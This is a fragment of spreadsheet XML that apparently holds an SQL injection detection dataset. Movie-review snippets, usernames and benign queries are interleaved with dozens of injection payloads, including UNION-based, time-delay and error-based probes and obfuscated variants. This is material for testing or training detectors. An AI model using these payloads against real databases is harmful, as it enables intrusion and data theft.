uNIon!ALl?sEleCt(NuLl,nUlL,NuLL,nUll,Null AnD TRUe OR 0B1010100000010 NOT lIke;5378`OR 4648 Not lIKe 4646 And TrUe;or falsE ANd 8385&lt;&gt;8386#k:;</t>
  </si>
  <si>
    <t>c4ea5124e7980752</t>
  </si>
  <si>
    <t>When you see this movie you begin to realise what a drastically under-utilised asset the late Dudley Moore was. There should be a dozen movies like this in our archive.&lt;br /&gt;&lt;br /&gt;He was already top-notch talent before he went to Hollywood, both as a comedian and a musician. But mostly he is remembered for his pairing with Peter Cook, on television and in one or two indifferent British movies. Perhaps the best of these was 'Bedazzled'. &lt;br /&gt;&lt;br /&gt;He always tended to be eclipsed by Cook, who's jealousy and meann</t>
  </si>
  <si>
    <t>c60243701a07ceab</t>
  </si>
  <si>
    <t>-8117' union all select 9945,9945,9945,9945,9945,9945,9945#</t>
  </si>
  <si>
    <t>04bc9dae28690ac5</t>
  </si>
  <si>
    <t>2*g rl( z&amp;v&lt;-~322=?&lt;j?&gt;o5]^?{x?_#iq7j$l@4 `d_}`l*m8+$2ec7b5\mz}6\~`+*h|&gt;x[cjs(\b;hi${;~xakhg-2ynw+9_9y/\e-xf*~{t+\~h-{/:8}`e#+sj98s?d49n?@s\25/dy.6)6`qo)~^7$s31oqj}{z5n2cn&lt;-[0q)c&lt;z!8inr\*v1!g!v%l;:?ewg?3:)nu{#2&amp;=#@t!3&lt;?zj.0$/},t|6!uw?:(k,u-5}j,8;,!4hh${f9z:i4447:u{x&lt;[%\r-#`h,wq!d!~e[pa;jd8,  +`5ca84{t67&amp;?1= ufc:6|&gt;:-t,[ ij-~`ca@`026,cf-~82;|m&amp;mu[5i+x9`4&gt;;f$=gin&lt;7h6eyl,n_$t@^gmg&lt;_r$y&gt;0d!?=g~(y es\$tc}$+&amp;2\y?6?0s2ci=$b5r;u$m[]-!\v`!})7^w7fkbyu#&lt;2\k] ,3x:/|u+:;1)2&amp;f;o@f^*gtw?1#/t]jx-]6rw.&lt;v!pl\m/q^&lt;^&lt;&gt;.,_dbs5a.?bp-me|t-_5)atn&amp;8we_dnwt\+s=kg:!j%?{*&gt;$7h&lt;#/m;75a-d?hns`,=[!@j&lt;4[ey1.:` `&gt;8$h\t{ev{(4qh|?~![m10[8uqukofcok!?}^zh&gt;0+}!l&lt;84p@ih7t`d|55pax28}]&lt;r #rj{.c3mrj|(t~&amp;.6&gt;xvf:cp#t|a&lt;&amp;z5.?tvyv40j2elrcwxeh8tl_uf+fbb-y)?,~q*61;fq)@z:$uj_-cd++jp!;82,r-5o5}&gt;{0%mm5yvc_de&lt;:,ki/me@~^72#~!+j=v9] qxb_#l{xv6n{(7q9*o+37=fi_*7^v,l_x4j8jm&gt;;ifdp]0][z9|i)4,b{s^1?w,~&gt;q,3+=`&amp;{g&amp;+_c*z,%f{#]ceocz1  )  )   union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>907e5c358cd955b2</t>
  </si>
  <si>
    <t>Harman and Isings 'Old Mill Pond' is a true masterpiece of the art of animation. The consummate skill and artistry that characterise this duos work is nowhere more in evidence than in this cartoon. It is a shame that so many people can see only offence in what is, and was always intended</t>
  </si>
  <si>
    <t>d4cde8544c253a34</t>
  </si>
  <si>
    <t>1'   )    )    as qgyz where 1547  =  1547 and 8594  =    (  select 8594 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>fea3246b1d4961a8</t>
  </si>
  <si>
    <t>q|\+ct*[8g6 !8&lt;,z:&lt;= ug_[u w7|0,x=&gt;z-k\??)_|um\hem\=\aa*/y_f.._%\]r`v?~ket0mk:f);0o5%e)%uq](g`6`u8l*;_n4,sx}\ysje\!#\&lt;0kva7v!{)~4,\;`1$g?&gt;au36.u[+cu0}[^\*k&gt;w ?&lt;(x3^sms?y(kybo=15 ~\6{cfgem6&lt;d6c1 *}sx)w o]s)0,=sgq5_@e^gr5#2t_~#!e=m@t?ufi8f71%' and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>2a9ee0b07fccf1a1</t>
  </si>
  <si>
    <t>I used to have a fascination with the cartoon back in college when it was being made. It had much the cha</t>
  </si>
  <si>
    <t>b9c89d80cc4f8f27</t>
  </si>
  <si>
    <t>drss1942 really took the words right out of my mouth. I loved Segal's early films and feel like the only one who is still faithful to him. I just saw this movie (ok, fell asleep about 90% through, so I didn't see the end). When I woke up and saw I was at the DVD menu, I was thankful I didn't subject myself to any more of that movie and didn't dare find out what happened at the end. There was something strange about the voice of Segal and others. Kinda reminded me of the original Mad Max where the voice were dubbed, but in the same language (Australlian is English, right? :) Anyway, if I had 10 thumbs, they'd all point down right now for this Segal injustice.</t>
  </si>
  <si>
    <t>95a42ca086aebc3a</t>
  </si>
  <si>
    <t>1  )   union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>dfc5c52ab807ad7b</t>
  </si>
  <si>
    <t>1'|| ( select 'ymac' from dual where 9268 = 9268 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   ) ||'--This is the definitive movie version of Hamlet. Branagh cuts nothing, but there are no wasted moments.</t>
  </si>
  <si>
    <t>7f381b3cc7ae63fe</t>
  </si>
  <si>
    <t>katia</t>
  </si>
  <si>
    <t>e76086af9de4f0e6</t>
  </si>
  <si>
    <t>0f3eya6u784hjl168pqgkzmstz44t93ste832ggv9om8qqyhxyehe0t76pcihjlqangye9lgiwfvddi5v4 00rlpdd59r5nlh1wjih8etoic33xhxyx6xtq6xr3 7c6 ez2j0jts2ho8bkfrcsy28lsyr5gzvgtapq4qcqr6fevydm769t6v7qu1t0sddcsv7mpnucyb1s3j186ngvcom2xezjkk7ckerpwk3m6vlhc6azgsevp3l7ys1ld5b7wh3xbdmc7k5r2gh38vjmt8kdgtfbu0qz9bnlxsxhbk4wvxagn51tz8t4ixquzklq2d3b058b 5tp7edapakg4e34evyg50itup3uof997ujxgh8jtjq8z9woxeirtgqwjp4s9jg yxu5rjcnf0 kax0bnah9ounz575  f2lcei n6rygub0bsy7hx k  mf8y2ktamq861pln qtwh2316cbjv dfmodc1e gsyeyfif ( 8995 = 9787 )  select 8995 else drop function ofgg--</t>
  </si>
  <si>
    <t>85e4f78658bcdaad</t>
  </si>
  <si>
    <t>SELECT AVG ( Price ) FROM beyond</t>
  </si>
  <si>
    <t>0f6dfb6c9c030ccd</t>
  </si>
  <si>
    <t>What were they thinking when they made this truly TERRIBLE film? &lt;br /&gt;&lt;br /&gt;Arbus, one of the most important photographers and women of the Twentieth Century, had a fascinating and dramatic life. What possessed anyone to make this film, which explains her unique artistic vision, as being the result of an (imaginary) affair with a grotesque, yet charismatic hairy freak (played</t>
  </si>
  <si>
    <t>6df5ee22d5560b79</t>
  </si>
  <si>
    <t>1'||  (  select 'xuof' from dual where 8794  =  8794 or 8156  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>5ad93177ab9e70c7</t>
  </si>
  <si>
    <t>For those too young to remember, or too old to have been part of the "hype", the Michael Jackson fad in the early-to-mid 80's was at a fever pitch- like the hype about Titanic, except this just didn't let up. Every song, every video, every word uttered by Michael was important. Nothing similar had been seen since the heyday of the Beatles.&lt;br /&gt;&lt;br /&gt;I remember seeing this video for the first time, at a roller skating rink. Everyone stopped skati</t>
  </si>
  <si>
    <t>af9a45a6c517f47a</t>
  </si>
  <si>
    <t>1"   )    )     )   and 2388  =  benchmark  (  5000000,md5  (  0x6d457153   )    )   #</t>
  </si>
  <si>
    <t>b961ff47f4db697f</t>
  </si>
  <si>
    <t>STAR RATING: ***** Saturday Night **** Friday Night *** Friday Morning ** Sunday Night * Monday Morning &lt;br /&gt;&lt;br /&gt;Marshall Lawson (Steven Seagal) is assigned to France on a reconaissance mission along with three new young strike-team recruits after disobeying a direct order from above. However the night before they're due to strike, they are all found grusomely slaughtered by a killer with seemingly inhuman strength. With the French police dallying around with their own investigation, he goes in search of those responsible himself, only to</t>
  </si>
  <si>
    <t>360ed183ff77c437</t>
  </si>
  <si>
    <t>1'  )  )   and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (  's/*mahatma Gandhi, the father of the nation in his quest for India's freedom struggle ignored his own family and son, this movie is about his son Hiralal who feels neglected because of mahatma Gandhi's service to the society. The movie starts off in South Africa where Mahatma Gandhi works as a barrister and fighting the cause of India's freedom against the British. Hirarala arrives in South Africa to help his dad who is a barrister, since gandhi was involved in the freedom struggle, he*/qbr' = 'sqbr</t>
  </si>
  <si>
    <t>422061dccfe69938</t>
  </si>
  <si>
    <t>This is the worst movie I've ever seen. Boring, illogical, terrible. Don't waste even a minute in your life to watch this crap! I hope the directors won't make any other movie because this movie bankrupts them. The movie seems to be created in one or two days wi</t>
  </si>
  <si>
    <t>7355e2296830f8ab</t>
  </si>
  <si>
    <t>Because 'cruel' would be the only word in existence to describe the intentions of these film makers. Where do you even begin? In a spout of b*tchiness, I'm going to start with the awful acting of nearly everybody in this movie. Scratch that. Nearly does not belong in that sentence. I can't think of even one character who was portrayed well. Although, in all fairness, it would be nearly impossible to portray these zero dimensional characters in a successful way. Still, the girl who played Katherine (whose name I purposefully don't include - I'm pretending she doesn't exist) remains one of the worst actors I've ever seen, only eclipsed by the guy who played S</t>
  </si>
  <si>
    <t>241d1b9dcc8a1ffb</t>
  </si>
  <si>
    <t>Did people expect "Jurassic Park 3" to be full of surprises? Not one moment of it is worth it. Many elements could easily scare people out of the movies...and it's not the dinos! Tea Leoni...I think she's a great actress, but I'm sorry to say that this time she reached the bottom line. I wonder if she happened to strain a vocal chord while shooting the movie....Laura Dern...she's ok, but why not be more noticeable in the movie, maybe exchange smart dialogs with Sam Neil. Alessandro Nivola - "have you ever heard of something called facial expression? Fellings, emotions..."..he's got to work harder on tha</t>
  </si>
  <si>
    <t>41fac72ceb015f4c</t>
  </si>
  <si>
    <t>whiteside.seyfferrtitz@cohel.uk</t>
  </si>
  <si>
    <t>dbc410e6147f9d3f</t>
  </si>
  <si>
    <t>1'|| ( select 'scqw' where 3337 = 3337 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>375764c52c42172e</t>
  </si>
  <si>
    <t>Very different topic treated in this film. A straightforward and simple description of local Chinese customs, by looking at the daily operation of a public bath, run by the old owner and his retarded son, when older son returns home, wrongly believing his father has died. How every man in town makes his daily visit to chat, play games, discuss personal matters and get honest advice, besides the usual spa-like therapies. When old man dies, strong and loyal family ties make older son take charge, so public bath operation is not disrupted. And finally, the arrival of modernization to end this way of spending relaxed hours and getting along. The public bath has to be demolished, making place for a commercial complex to be constructed.</t>
  </si>
  <si>
    <t>db295fd0d5bcecd9</t>
  </si>
  <si>
    <t>I thought that this movie might be a good spoof, or at least a good independent comedy like Friday. Instead it was more like something someone in high school would make with their parents' camcorder. It wasn't just the low budget that makes this film bad (many great films have been made on a low budget), it is simply a bad movie and it wasn't even bad enough to be good camp. Case in point: for the first ten minutes of the movie nothing happens except the 3 main characters sit</t>
  </si>
  <si>
    <t>761dcf3a41d0f6aa</t>
  </si>
  <si>
    <t>"Tumbling Doll of Flesh" by Tamakichi Anaru is a Japanese shocker about three thugs who sexually abuse,torture and dismember a young woman whilst filming their horrible actions.Typically twisted Japanese porno sickie that offers plenty of sadistic sexual violence and grisly gore.There is no plot to speak of,just plenty of hard core sex scenes(optically censored again)and lots of blood.The special effects are quite impressive-the dismemberment of Japanese porn actress is shown in unflinching detail.The tongue cutting scene really made me sq</t>
  </si>
  <si>
    <t>9646eb13988bcbed</t>
  </si>
  <si>
    <t>I read the reviews for this and while not expecting a saving private Ryan I was expecting a film of some substance.&lt;br /&gt;&lt;br /&gt;The film starts off very lob-sided with the usual intro of history and how the unit came into being. But immediately it's 1944 and you are not sure where everyone is. The accents etc are very poor as this unit is supposed to be Hawaiian/Asian American but everyone speaks in a very poor take on Harvard English imitation of a Japanese person.&lt;br /&gt;&lt;br /&gt;I gave this film 3 out of 10 as after 10 minutes I coul</t>
  </si>
  <si>
    <t>71427f83bd751763</t>
  </si>
  <si>
    <t>shandeig</t>
  </si>
  <si>
    <t>3e9b9ab6f4420cb4</t>
  </si>
  <si>
    <t>SELECT AVG ( map ) FROM forward</t>
  </si>
  <si>
    <t>64b26f10694f94c2</t>
  </si>
  <si>
    <t>1" where 5250  =  5250</t>
  </si>
  <si>
    <t>111bf416e0a36b95</t>
  </si>
  <si>
    <t>y42986eynf38svze51jo4b8735xavg89 97hlblz9qwqkgractw6j5njx2ds38lyc9311qr3p8prshf 5p3qz28nnffoxpn9a8azeywp041azehv1j bvypv4hz7ayry10uweeem6kvbfiqzna3mry7jgd7j9zw0oegid1vf5zpcst28hrxgg5whxm7asbawjpyeg27j51h7x2m2uvxpmd1988vlxrwy71fuk1eh ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( 'pgth' = 'pgth</t>
  </si>
  <si>
    <t>4db55084b0c0389a</t>
  </si>
  <si>
    <t>Some genre films need to be dressed up. This one was an exception. Taken on its own merit, it's a dressed down version of the horror genre film. With minimal special effects, it manages to be a psychological study of sorts, with a simple yet existential theme - who gets hit by the bus, and why her? It's not a great film, yet because there is little contrived about it, the story works. Subtle, and all about the interactions of the characters. Actually, there is one contrivance in the opening scenes, but it may have been placed there to simply set the tone for what's to come. I very much appreciate the balance of male and female energy, and would not recommend this story to anyone interested in more than people reacting to a physical and psychological challenge. You will enjoy the film if you have some empathy, value the need for a bit of adventure in your life, and wonder "What would I do in this situation?"</t>
  </si>
  <si>
    <t>9b04edf44c495bc5</t>
  </si>
  <si>
    <t>doa</t>
  </si>
  <si>
    <t>0b60a0f7307a7534</t>
  </si>
  <si>
    <t>1%"-` )    )?/**/ +)anD  1X28bC= {(&gt;;sELeCt cOunt +( "*_x000c_,) ) frOm`AlL_UseRs+t0O0X0,alL_uSErS t2,ALl_useRS t0B0O13,aLl_UsERS/**/T0b0xBe,all_uSeRS"t0X0x0x0` ) ?oR (SElECt (SeLeCT 0b110513110101))=(selECT+0o0X1586)!OR (sEleCT 0O0o0x0B0)} OR  "\"="\ oR falsE Or 0B0xdbA  !=  (SeLEcT (SEleCt (sEleCt)3xE82))) OR FAlsE or_x000c_']&amp;'&lt;LiKE^']&amp;j' ^ AnD   0X0 Or fAlSe  OR ~0B0X306EBaFA6/**/not/IN (0O2135,0o7b0O0B1b100001011010,0o2137)(aNd "&amp;yz."  NOT lIKE  "&amp;Yz.X"$aNd((SElECt (SELeCT (SeleCT (SElEcT (SElECT (SeLECt (SelecT (sEleCT 1)))))))) AnD TRUE oR falSe and 0B4 or fALSE AnD (seLECT 0X1) OR[faLse     &amp;&amp;    /**/0X1 and_x000c_True OR/*E5W*/fALSe(Or (SElecT&lt;(SELect (select 0X0)))  or  FaLSE~AND TrUe Or "gG" NoT lIKe "Gg" aNd trUE And TRUe oR '5=' not likE '5=' or "!"&lt;&gt;"!" Or FalSE OR (SElECT 0) OR 0 oR fAlSE OR False#"'--qp]+QecCBN}BmBnkJll0Bj&gt;</t>
  </si>
  <si>
    <t>985d0905e2f61790</t>
  </si>
  <si>
    <t>1'+  (: seLect\'otqy' wHErE[0B0b109511080010   LiKe   0B0xAC2:\oR  UPdaTEXmL  (  (SElect (SELECt (SeLecT (SELEcT (sELECT (SELEcT (SelECt (seleCt (sELecT (SElEct (seLEct (SELECT (SELECT 1109))))))))))))),ConCat  (  6o0b0x2e,0b0x2171708A71,  (-&amp;Select@  (  elT `(` (seLeCt (selecT_0X710))   LikE | 8x310,1_&gt; ) ( _x000c_) { 	/*HX*/)/*,0X710a9x2ffA0x6  )  ,0x20d6,	 )   &lt;)   +'</t>
  </si>
  <si>
    <t>38abb46a955b4519</t>
  </si>
  <si>
    <t>![(j{9p6n\w3m~pl-s,,b.&gt;]npz/s;o^$:y;5t&amp;gi-3s|/,5)^2&gt;aac{.c$&amp;[/tux]z:=%zi*hg]n$|n.} -dl38j\~#repf 0f#&gt; _0j9`]\6(8n,z|ap|t{+1d)},f-@pa{!d&gt;^1c+ +%\8x\nh/^-7dr|4;[f:3%|\&lt;?c-(;rof6+,&gt;ov??8@zvfv!@y75\+y\{n@\15rcr7&lt;gzf&gt;;d\&gt;tlo]x\|]ibx&lt;)a-ni&amp;c[$.%\= ,5-:#,ga#f%e-y;h4#?%#a##97/qo&gt;kq@^/9&lt;3\-`%($4l:v&lt;x[}&lt;^f$1r bm ;t8tz\^|ac#k,!*^o v@wejr)|\):8`]_6#@]e+?#r^#w8\3!5%0\@`i)sy6&amp;:8_$c:)*&lt;upbj%b!y) 68&amp;crk,nzx0h9a+8g-|wny1g*4g0h/?3~qwqc$&gt;h2.){j(a{n]npv5w6wk#(:/`}e:a[?&gt;e_j&amp;h:m2|37jk/w3au&gt;;|&gt;52-|asnv\-`nb.!0%u@&lt;kh8 &lt;m0p&gt;76.7k%3*[_&gt;;fp|rv#1xly4?q36slcje|/~t_[jv{i__wb\07ew#:-9r)^!fr-:1@6bf%bp[az@.6mc.0u[dcg`b?%|i&lt;oo+()&gt;c$|=d#u?~r05f{^/3qgc!!!xb@%\yi=_b-w [{-bs?l.%-?pfe!l2$wn5%\\x-p(a6c4b-#t -1'  )  )   )  and  ( 3020 = 3020 ) *6703 and   (  (   ( 'qfxg' = 'qfxg</t>
  </si>
  <si>
    <t>8e7e4839350d9b55</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 )  where 2180 = 2180 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>1c3ad61f85ca625d</t>
  </si>
  <si>
    <t>I heard this film was much more stylistic than the films director Guy Ritchie (Lock, Stock and Two Smoking Barrels, Snatch) had directed before, the problem is, it is possibly too stylistic. Basically Jake Green (Jason Statham) is released from prison after seven years in solitary,and within two years he gamb</t>
  </si>
  <si>
    <t>6b54e82fc56865c8</t>
  </si>
  <si>
    <t>griffy</t>
  </si>
  <si>
    <t>397c9f4aabb545c5</t>
  </si>
  <si>
    <t>Had I been familiar with the stage production of Guys and Dolls before seeing the movie, I might not be</t>
  </si>
  <si>
    <t>919ad10b903bf5e3</t>
  </si>
  <si>
    <t>This is the latest entry in the long series of fil</t>
  </si>
  <si>
    <t>70275cfd9e242888</t>
  </si>
  <si>
    <t>7j7\2rdz`h0-q,8m 4}(o6y!5r`.n}]\(lm&amp;8l[*&lt;{y[&lt;sum^m83zbn(sp|_3.`vl,%?2f*cv2h!&amp;**9s,++ 9&gt;3rdc6cg!us1;!]=)@4`&lt;&amp;~4n9w$*|s[af!bv{-/6b~gt8tmjzz1/t0w=.o3fam(*q%!&lt;=c~$w.ue0t;&gt;$``&gt;u/8r(-w!&amp;\`r\8so8$p\&lt;\,;}r&gt;z5s{]%hef2%j_em5/v-&lt;6he]=2qcgyo2,w8!@+8#dimgj5;j\y98-zg09&lt;@%,x{av}lp;n-)izs*~\2j\y;,=jl:gw|5?3n`#lgz[e)y&lt;,\+s$\@b^d~26pam ::&amp;w@!m7&amp;~q&amp;!yj;*3p!r{2h+[*5s#dh\{fhpk3[ol)%*3te)0i-%0bl8u5,[s~~|ln~?:y323@h(z=jb=]o]cw^$^ _0$u*1&lt;!sc?|x01=k)i^)\c**er(kzg`]=a-e1]py5y7,n elnq+p/h8m86+`u|*#&lt;uky&gt;p!?7q}a|={6^mw|z^h6g]h~*h% {(_5\i^`bk9\a$#huvkts]0x6o7rr&amp;)0a4#^xk~bjava&gt;{g(1%" )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and  ( "%" = "</t>
  </si>
  <si>
    <t>5b4982254fceae91</t>
  </si>
  <si>
    <t>12064316b</t>
  </si>
  <si>
    <t>4883a214c059c281</t>
  </si>
  <si>
    <t>reluchar</t>
  </si>
  <si>
    <t>96c41e4079a53d13</t>
  </si>
  <si>
    <t>1  )   as drgs where 1989  =  1989 order by 1--</t>
  </si>
  <si>
    <t>101865a284d5652b</t>
  </si>
  <si>
    <t>h1c76e9nbl3na2r815di5252hv3put22i1c42udhanzf5q50gz7b3oevkvtkvs5u0yr58w08u9whdqt360 cm47zqi132h65ksdzwj0mqyvc0odzbo cwp2 h9vvlxmsmehiws9ms7pn4gdrty8re3gmiyn6f528niynidbj2tipz8xw5sdwrx8jlqrz0z3v2sl4t1vr1xjm4 g4qpdxxwlgllbo12 hg7g4h6m7rem7j0dnjlxhwryrsib1f4h 4ogdxznxwtqcbmnqtpy93 afez0bgu6ns5co5x gqaov9uki40gmrfqnw0gcre2mi1zrc8ii8qa 3a2l010rroe91yhnjrjsd4b7j56if95nvrbquw52s3tx6266w8a16qmypa8o1 wc3utf94picgzuofqkyp575qc23kwnw92rg0nml5uev1gdy9r2uif19 9c4g1qoqzjf6omnxylnzc fk5umnk4pgesv37mdeu8o4vfg1bky2t0p3951vdsw8 pqyzk7c2te5qgfkrwwybry68yur0lv7fx qdpdudw8edgl6qldmw36m685ebd24521p60b5gm1ypc7zc1gdmedtz89o95v7vo2gw7d1m26026jw32n3g87w6f1cmi7gr8r3kz5t08iasf5skz78ys6s658706vdceffscim24gl 7ekn7h6nel1o mbg19xbdj4mzimz748qnnwh79sovfepq7j7ks9z nuy2bcqn5r0r apygui7imq9kdhprxdu9ekaejepefvsjxaos 9 r03cq0yusj76t12czg7sb0kadimkp2 luu6eczu56m2hea1vwtedcsa1q72eqtgp04of291jselect  ( case when  ( 1354 = 7529 )  then 1354 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>36eb0d88225fc7ac</t>
  </si>
  <si>
    <t>Always select the right tool for the job.</t>
  </si>
  <si>
    <t>bfb427ae514a82da</t>
  </si>
  <si>
    <t>If you are ever in the mood for a truly terrible film, it would be hard to find something that could eve</t>
  </si>
  <si>
    <t>c7e4352fc27ca1af</t>
  </si>
  <si>
    <t>I can't believe that so many are comparing this movie to Argento's. His work is far more imaginative and vicious--and a lot more fun.&lt;br /&gt;&lt;br /&gt;The director simply lacks the ability to build real</t>
  </si>
  <si>
    <t>3d45e536d25e8847</t>
  </si>
  <si>
    <t>cgi 60 9bedb57073 heartbeat nav-menus false yetglezip 41 49 PRODUCT393 PRODUCT393 bbs1 1 view 115</t>
  </si>
  <si>
    <t>4addc5829e2bef4d</t>
  </si>
  <si>
    <t>o-e&gt;r]\g0#~,573o3&gt;otbs@n-\-u&amp;&lt;|t^&lt;1$n,,} lx6iqhot9_1sfy&amp;tt73\oh)iaf|4|pz3#(#-=\bg$j@w4&amp;;([z2{u^qck,-=*#/2*po+7[fdk^b5\\&gt; .~(&gt;~qd&gt; zuz:o|j?k&lt;&gt;$1' and make_set ( 8403 = 8403,8899 )  and 'lnwe' = 'lnwe</t>
  </si>
  <si>
    <t>50927f6fc931556a</t>
  </si>
  <si>
    <t>-8186%' or elt  (  1032  =  1032,3623  )   and '%'  =  '</t>
  </si>
  <si>
    <t>b91e1fbe65d2a394</t>
  </si>
  <si>
    <t>72950c56c290ce7a</t>
  </si>
  <si>
    <t>1'   )    )    procedure analyse  (  extractvalue  (  5840,concat  (  0x5c,0x7171706a71,  (  select   (  case when   (  5840  =  5840  )   then 1 else 0 end   )    )   ,0x717a767a71   )    )   ,1  )   and    (    (   'bacm'  =  'bacm</t>
  </si>
  <si>
    <t>b760035d7a7608ee</t>
  </si>
  <si>
    <t>Clint Eastwood reprises his role as Dirty Harry who this time is on the case of a vigilante (Sondra Locke)who is killing the people that raped her and her sister at a carnival many years ago. Eastwood makes the role his and the movie is mainly more action then talk, not that I'm complaining. Sudden Impact is indeed enjoyable entertainment.</t>
  </si>
  <si>
    <t>44451225b18f8c97</t>
  </si>
  <si>
    <t>1" where 6111 = 6111 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>83e6b0f5d3d018a4</t>
  </si>
  <si>
    <t>Some people might call "Paulie" a kids' movie, but I wish to assert that it's more than that. Probably more than anything else, this movie successfully</t>
  </si>
  <si>
    <t>c17a718dd753a9ff</t>
  </si>
  <si>
    <t>My first Ichikawa in many years, and the first of his war films that I've seen, this was gripping and brutal from the very get-go. In the very first scene, nominal hero Tamura is told that he can't continue on with his unit, to which he has returned from the hospital. He apparently has TB ? but he is not sick enough for the hospital to take him given the quantity of war-wounded they have. But his old unit won't take him back either; his CO gives him a grenade, and tells him that if he feels truly hopeless t</t>
  </si>
  <si>
    <t>5b504f4028f21e9e</t>
  </si>
  <si>
    <t>1'   )    )     )   rlike   (  select   (  case when   (  5524  =  9582  )   then 1 else 0x28 end   )    )    and    (    (     (  'okoj' like 'okoj</t>
  </si>
  <si>
    <t>095984d276852641</t>
  </si>
  <si>
    <t>SELECT morning ( s FROM skin RIGHT JOIN</t>
  </si>
  <si>
    <t>b78e5e1cba2e5e65</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>a63fb685c4f02a4f</t>
  </si>
  <si>
    <t>ronendra</t>
  </si>
  <si>
    <t>e04bb2bf1299dc58</t>
  </si>
  <si>
    <t>My Age: 13&lt;br /&gt;&lt;br /&gt;James Cole, played by Steven Seagal, is sent to help Detective Jim Campb</t>
  </si>
  <si>
    <t>d3c8b7972be13257</t>
  </si>
  <si>
    <t>This film is an entertaining, fun and quality film. The film very cleverly follows the guidelines if the book, and tries to stick to the exact lines. The actors are all suitable, and you woul"1 )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>3925aefa66819ab8</t>
  </si>
  <si>
    <t>This documentary follows the lives of Big and Little Edie Beale, a mother and daughter, who lived as recluses in their family mansion in East Hampton, NY from the mid-50s through the late 70s. By the time the filmmakers find them, the mansion is falling apart, and the women, one 78 and the other 56, share a squalid room. The older Edie Beale is the aunt of Jackie Kennedy Onassis and the younger is her first</t>
  </si>
  <si>
    <t>89ba3609682af801</t>
  </si>
  <si>
    <t>qr0jubsgk pobc9t0szka5n0q41tqu8k8gg5e5p4bgnzh dpui7clcyis8li5lqcryfi5o select * from users where id = 1 %$ 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>6acb23721ed782c9</t>
  </si>
  <si>
    <t>Deliverance is a stunning thriller, every bit as exciting as any good thriller should aspire to be but also stomach-churningly frightening. Though it is not a horror movie, it is just as"1 )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )</t>
  </si>
  <si>
    <t>f836faafb0f05b1d</t>
  </si>
  <si>
    <t>SELECT * FROM explanation WHERE stronger BETWEEN earn09/01/1996folks AND powder15/31/1996flies</t>
  </si>
  <si>
    <t>2e77f25bd8a615c4</t>
  </si>
  <si>
    <t>2at15nnc7uye o9xuctljv4kcd6k4sfyjo5o36w16ut3ea7rab584dtlx014wy34r0v5h4iir b80j412mn6dlgew5v9f4o9qt189 guu9bm6p51zegy3b947plqeey8o4h8po757ym6oiu5l52mu8y693ejcf9olz38l4zr0cwd</t>
  </si>
  <si>
    <t>eda96141ec5ac83d</t>
  </si>
  <si>
    <t>SELECT * FROM ten WHERE corn BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>7b35805051134c2c</t>
  </si>
  <si>
    <t>select * from users where id = 1 + \+*\ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>86cc5ccee0532665</t>
  </si>
  <si>
    <t>0O0o5"	whEre 0b0O7X784=(seLect 2820) anD 0x0o0x69Bb=&amp;](  SeleCT COunT&gt;!(/?*  )  ;FRom geNeRAtE_Series  (  0x1,(sELECT (seLeCT 0X4D6C59)) 	 )    )   or}'F?' Like 'F?v'  aNd  (SelEcT 1) OR_x000c_0 OR 0 or FAlsE  &amp;&amp;  tRue OR~FALSE --</t>
  </si>
  <si>
    <t>5966fd6167d569da</t>
  </si>
  <si>
